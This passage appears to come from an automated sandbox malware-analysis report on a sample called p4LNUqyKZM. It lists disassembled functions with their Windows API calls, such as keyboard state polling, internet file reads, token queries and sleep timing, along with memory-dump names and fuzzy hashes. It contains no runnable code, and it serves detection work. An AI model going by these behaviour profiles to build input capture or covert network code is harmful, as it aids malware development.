                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,009FAB79,00000000,00000000), ref: 00A16C98
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A16CC7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Long$MessageSendShow
                        • String ID:
                        • API String ID: 3688381893-0
                        • Opcode ID: eb991aedd81e60ec088850f9fc70fe48fdd88f828f932828dd60a388853a0aa3
                        • Instruction ID: d49461715a3f665373127f938a997e5f8b334d203e3d57ad6810a72ae9e5539a
                        • Opcode Fuzzy Hash: eb991aedd81e60ec088850f9fc70fe48fdd88f828f932828dd60a388853a0aa3
                        • Instruction Fuzzy Hash: 4B41B439644104AFD724CF68CD58FE97BA9EB09360F154268F995E72E0D371AD81CA90
                        Function 009B2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 9c26de1b54dd228f2620ccf3d04b86af2921982987511f315e116b16106dbd01
                        • Instruction ID: 95740bfd6eed466660426b55a6866876260bb165b1d1c611384f683e26ad2079
                        • Opcode Fuzzy Hash: 9c26de1b54dd228f2620ccf3d04b86af2921982987511f315e116b16106dbd01
                        • Instruction Fuzzy Hash: EB41E476A00200AFCB24DFB8CA81A9DB7F5EFC9324F154568E515EB355DB31AD01CB80
                        Function 0099912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 00999141
                        • ScreenToClient.USER32(00000000,?), ref: 0099915E
                        • GetAsyncKeyState.USER32(00000001), ref: 00999183
                        • GetAsyncKeyState.USER32(00000002), ref: 0099919D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        • Opcode ID: ff0c9822d4cffef1541b35c0ca393e8d53ed66f486da54253beab1e0f5feef4a
                        • Instruction ID: c91e704ce05efdb545e71ad33230c90237432ede2965eea9ba572a879be58f01
                        • Opcode Fuzzy Hash: ff0c9822d4cffef1541b35c0ca393e8d53ed66f486da54253beab1e0f5feef4a
                        • Instruction Fuzzy Hash: 57415E31A4C61AFBDF159FA8C844BEEF779FB05320F20871AE425A62D0D7346990CB91
                        Function 009F3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetInputState.USER32 ref: 009F38CB
                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 009F3922
                        • TranslateMessage.USER32(?), ref: 009F394B
                        • DispatchMessageW.USER32(?), ref: 009F3955
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F3966
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                        • String ID:
                        • API String ID: 2256411358-0
                        • Opcode ID: 9f76264cc2d848c14f0742b5671a3a57272d1f0b436c02b6d40c966dba3fafc8
                        • Instruction ID: f652c307c5cdbc0b5386bad92d04bec2c8a85e86b0e6027454a7484105f57d9e
                        • Opcode Fuzzy Hash: 9f76264cc2d848c14f0742b5671a3a57272d1f0b436c02b6d40c966dba3fafc8
                        • Instruction Fuzzy Hash: FB31F77054434ADEEB35CBB5D848BB637ECAB01351F04856DE662821A0E3FC9AC6CB11
                        Function 009FCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 009FCF38
                        • InternetReadFile.WININET(?,00000000,?,?), ref: 009FCF6F
                        • GetLastError.KERNEL32(?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFB4
                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFC8
                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                        • String ID:
                        • API String ID: 3191363074-0
                        • Opcode ID: 97f5806a43dd523c259e0cbdf0a414a88910c3e107a3aa643ee14c86dc5bd5ac
                        • Instruction ID: 00f852fb88fc557f54db8264788b0f856fdfa0bd47b94444168435823011db0f
                        • Opcode Fuzzy Hash: 97f5806a43dd523c259e0cbdf0a414a88910c3e107a3aa643ee14c86dc5bd5ac
                        • Instruction Fuzzy Hash: F2314CB150420DAFDB20DFA5CA84ABBFBFDEB14351B10842EF616D2141DB34AE41DB60
                        Function 009E1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 009E1915
                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 009E19C1
                        • Sleep.KERNEL32(00000000,?,?,?), ref: 009E19C9
                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 009E19DA
                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 009E19E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        • Opcode ID: 9b9f30c64515e281a363a8145282481ff444b2395db11c486af02592147b9400
                        • Instruction ID: 17bc8b0c484923f6d39a4726cdbb36ef77b5b87c0e72e61c10770840475d3dba
                        • Opcode Fuzzy Hash: 9b9f30c64515e281a363a8145282481ff444b2395db11c486af02592147b9400
                        • Instruction Fuzzy Hash: 3831D471900259EFCB00CFA9DD99ADE3BB5FB44325F108225F961A72D2C7709D44CB90
                        Function 00A15706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A15745
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A1579D
                        • _wcslen.LIBCMT ref: 00A157AF
                        • _wcslen.LIBCMT ref: 00A157BA
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A15816
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$_wcslen
                        • String ID:
                        • API String ID: 763830540-0
                        • Opcode ID: 2bb0de54c4b2a73ccefe1fe8b1eddcb330aeb984cde1fdec375bd81643d3015e
                        • Instruction ID: 7c0166f65628e929da0ba22579b15806155c9c6a84e4d753a2e9477b75b42739
                        • Opcode Fuzzy Hash: 2bb0de54c4b2a73ccefe1fe8b1eddcb330aeb984cde1fdec375bd81643d3015e
                        • Instruction Fuzzy Hash: 75217171D04618DADB209FB4CC85AEEB7B9FF85724F108616E929EA1C0D77489C5CF90
                        Function 00A00930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                        • IsWindow.USER32(00000000), ref: 00A00951
                        • GetForegroundWindow.USER32 ref: 00A00968
                        • GetDC.USER32(00000000), ref: 00A009A4
                        • GetPixel.GDI32(00000000,?,00000003), ref: 00A009B0
                        • ReleaseDC.USER32(00000000,00000003), ref: 00A009E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        • Opcode ID: 4b14ff891bfe735bf534665caa7ba94c3bf479a72363bbeb900bf4fb6821b005
                        • Instruction ID: 88a3685e51a21a0ae63c9892d7b99c484710a27b0602c1f5b8a04bb08fd47452
                        • Opcode Fuzzy Hash: 4b14ff891bfe735bf534665caa7ba94c3bf479a72363bbeb900bf4fb6821b005
                        • Instruction Fuzzy Hash: 99218175600204AFD704EFA5D884FAEBBF5EF84750F048068F95A97362CB70AC45CB90
                        Function 009BCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 009BCDC6
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009BCDE9
                          • Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009BCE0F
                        • _free.LIBCMT ref: 009BCE22
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009BCE31
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 1cbc242f205076532fbdb534e59abbbed7aeaaea114bf064c28d872a459ebb71
                        • Instruction ID: f5398f2c1febbf07e0f1ff8cfde0f8282f95b8159329c5221bd0bfc852d252f4
                        • Opcode Fuzzy Hash: 1cbc242f205076532fbdb534e59abbbed7aeaaea114bf064c28d872a459ebb71
                        • Instruction Fuzzy Hash: 6C01A7B2601615BF63215AF66D8CDFBBA6DDEC6FB13154129FD05DB201EA61CD0281B0
                        Function 0099990C Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000008), ref: 009998CC
                        • SetTextColor.GDI32(?,?), ref: 009998D6
                        • SetBkMode.GDI32(?,00000001), ref: 009998E9
                        • GetStockObject.GDI32(00000005), ref: 009998F1
                        • GetWindowLongW.USER32(?,000000EB), ref: 00999952
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Color$LongModeObjectStockTextWindow
                        • String ID:
                        • API String ID: 1860813098-0
                        • Opcode ID: ecd378060967a8d880973097fd0b35e9f2c52d0354ece0db1ad958aae41aa911
                        • Instruction ID: 203b8c6403b8627a81f20841fc79157205e9da8fc1b2f84656db6cbf403fbf46
                        • Opcode Fuzzy Hash: ecd378060967a8d880973097fd0b35e9f2c52d0354ece0db1ad958aae41aa911
                        • Instruction Fuzzy Hash: 68210431186290AFDF228F7DEC59AE93F68AB13331F18825DF5A24A1A1C7314952CB51
                        Function 00999639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                        Download Yara Rule
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
                        • SelectObject.GDI32(?,00000000), ref: 009996A2
                        • BeginPath.GDI32(?), ref: 009996B9
                        • SelectObject.GDI32(?,00000000), ref: 009996E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: 2378a7e4114bb2749d39a2c1d6fd798f57fad0b0e8b45d081808b710f874ea1c
                        • Instruction ID: 1ded7ffd045e6878e8b8ab5e031363400b2194e982298cdebec69817a718d0cd
                        • Opcode Fuzzy Hash: 2378a7e4114bb2749d39a2c1d6fd798f57fad0b0e8b45d081808b710f874ea1c
                        • Instruction Fuzzy Hash: E8215E70842305EBDF11DFECEC187F97BA9BB51366F10421AF411A61B0D3759892CB94
                        Function 009E5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: 4292aed827180ebca4c7f9e7eb6147a0ca838dc7eadef073f5c85a5cba4ab5df
                        • Instruction ID: 960c9b7b760e881766902591402f33a3385e489f836b182e393499df42ba8a74
                        • Opcode Fuzzy Hash: 4292aed827180ebca4c7f9e7eb6147a0ca838dc7eadef073f5c85a5cba4ab5df
                        • Instruction Fuzzy Hash: F501B5A2645649FFD60995129D92FFB735DAB61398F014420FD089A242FB62EE6082E0
                        Function 009B2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6), ref: 009B2DFD
                        • _free.LIBCMT ref: 009B2E32
                        • _free.LIBCMT ref: 009B2E59
                        • SetLastError.KERNEL32(00000000,00981129), ref: 009B2E66
                        • SetLastError.KERNEL32(00000000,00981129), ref: 009B2E6F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: 5d60204497cd13252f4f09bfc1d5816c538e167d303c8ae833998a6d14e52457
                        • Instruction ID: 44fc0d45d83d9bc5758b41114710fa2cc0b56b1f7566e2383ef987bee4fddec0
                        • Opcode Fuzzy Hash: 5d60204497cd13252f4f09bfc1d5816c538e167d303c8ae833998a6d14e52457
                        • Instruction Fuzzy Hash: F801283624561077C613A7BA6F45EEB266DEBC67B1B218928F839A31D3EF34CC024020
                        Function 009E000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                        Download Yara Rule
                        APIs
                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?,?,009E035E), ref: 009E002B
                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0046
                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0054
                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?), ref: 009E0064
                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0070
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        • Opcode ID: 7b9130e45e97e5fa893c230d6184bc6a161983023509443264d8e6ea79906c20
                        • Instruction ID: a3fe718896204edad7339ad6e7920be0aadc8b4ab36613cabbca820ca0144a1b
                        • Opcode Fuzzy Hash: 7b9130e45e97e5fa893c230d6184bc6a161983023509443264d8e6ea79906c20
                        • Instruction Fuzzy Hash: 7701A272640204BFDB129FAADC44BEA7AEDEF84762F148124F905D6210E7B5DD81CBA0
                        Function 009EE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?), ref: 009EE997
                        • QueryPerformanceFrequency.KERNEL32(?), ref: 009EE9A5
                        • Sleep.KERNEL32(00000000), ref: 009EE9AD
                        • QueryPerformanceCounter.KERNEL32(?), ref: 009EE9B7
                        • Sleep.KERNEL32 ref: 009EE9F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: 01d812a32de7f61f79a3ed5d47116a7526f8c0b75486049c93d4ce4e8a5df8c1
                        • Instruction ID: 3b5a89c777ee7d6643093cdaf312ad96d6a29b9baae15993568e521abaca6820
                        • Opcode Fuzzy Hash: 01d812a32de7f61f79a3ed5d47116a7526f8c0b75486049c93d4ce4e8a5df8c1
                        • Instruction Fuzzy Hash: 88015731C41A2DEBCF00EBE6DD49AEDBBB8BB09310F004646E502B2242CB349951CBA1
                        Function 009E10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        • Opcode ID: c8d36f3174ef87025c3fb3cc62d6c8730e7e6a29dd7f9ebb11ed360407dcc031
                        • Instruction ID: 0e60b4c22cc482286f04efb8929485fe74e0a5dc82a7288b6856063893b59d2c
                        • Opcode Fuzzy Hash: c8d36f3174ef87025c3fb3cc62d6c8730e7e6a29dd7f9ebb11ed360407dcc031
                        • Instruction Fuzzy Hash: 6A013179140315BFDB128FA5DC49EAA3F6EEF85370B104415FA45D7350DB71DC119A60
                        Function 009E0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009E0FCA
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009E0FD6
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009E0FE5
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009E0FEC
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009E1002
                        Memory Dump Source
